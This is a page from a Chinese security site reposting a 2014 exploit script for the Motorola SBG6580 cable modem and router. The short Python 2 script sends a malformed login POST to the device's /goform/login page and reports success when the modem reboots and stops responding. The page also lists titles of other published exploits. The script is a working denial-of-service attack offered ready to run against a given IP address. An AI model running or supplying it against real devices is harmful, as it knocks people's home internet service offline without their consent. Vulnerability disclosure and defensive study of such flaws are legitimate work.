首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Motorola SBG6580 Cable Modem & Wireless Router - DoS Reboot
来源:vfocus.net 作者:nicx0 发布时间:2014-01-29  
# Exploit Title: Motorola SBG6580 Cable Modem & Wireless-N Router Denial of Service
# Date: 01/03/14
# Exploit Author: nicx0
# Vendor Homepage: http://www.motorola.com/
# Version: SBG6580-6.5.0.0-GA-00-226-NOSH
# POSTing a bad login page parameter causes the router to reboot.
   
import sys
import socket
import urllib2
import urllib
router_ip = ''
try:
      router_ip = str(sys.argv[1])
except:
      print 'motobug.py ip_address : e.g. motobug.py 192.168.0.1'
      sys.exit(2)
query_args = {'this_was':'too_easy'}
url = 'http://' + router_ip + '/goform/login'
post_data = urllib.urlencode(query_args)
request = urllib2.Request(url, post_data)
try:
    print '[+] Sending invalid POST request to ' + url + '...'
    response = urllib2.urlopen(request,timeout=5)
except socket.timeout:
    print '[+] Success! No response from the modem.'
except urllib2.HTTPError:
    print '[-] Failed: HTTP error received. The modem might not be a SBG6580.'
except urllib2.URLError:
    print '[-] Failed: URL error received. Check the IP address again..'
else:
    print '[-] Failed: HTTP response received. Modem does not appear to be vulnerable.'

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Nitro Pro Remote Code Executio
·Oracle Forms and Reports 11.1
·Simple E-Document Arbitrary Fi
·PCMAN FTP 2.07 ABOR Command -
·Mp3info Stack Buffer Overflow
·haneWIN DNS Server 1.5.3 - Buf
·Ammyy Admin 3.2 - Authenticati
·PCMAN FTP 2.07 CWD Command - B
·Daum Game 1.1.0.5 ActiveX (Ico
·Linux 3.4+ recvmmsg x32 compat
·MW6 Technologies MaxiCode Acti
·Linux kernel 3.4+ local root (
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved